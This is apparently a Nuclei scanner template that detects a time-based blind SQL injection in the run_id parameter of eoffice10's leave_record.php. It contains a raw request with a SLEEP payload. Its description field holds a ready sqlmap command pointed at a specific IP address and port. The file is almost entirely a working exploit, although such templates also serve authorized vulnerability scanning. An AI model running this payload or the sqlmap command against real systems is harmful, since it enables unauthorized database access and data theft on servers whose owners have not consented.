id: run_id_SQL
info:
  name: run_id存在注入
  author: weehhd
  severity: high
  description: https://mp.weixin.qq.com/s/qDfjJvubKb7lfNOLkKGJZQ;python .\sqlmap.py -u "http://222.88.202.112:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1')++AND+(SELECT+7025+FROM+(SELECT(SLEEP(3)))bRHV)%23&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Pragma: no-cache
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: or
        words:
          - 'download_attachment'
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
      - type: dsl
        dsl:
          - 'duration>=3'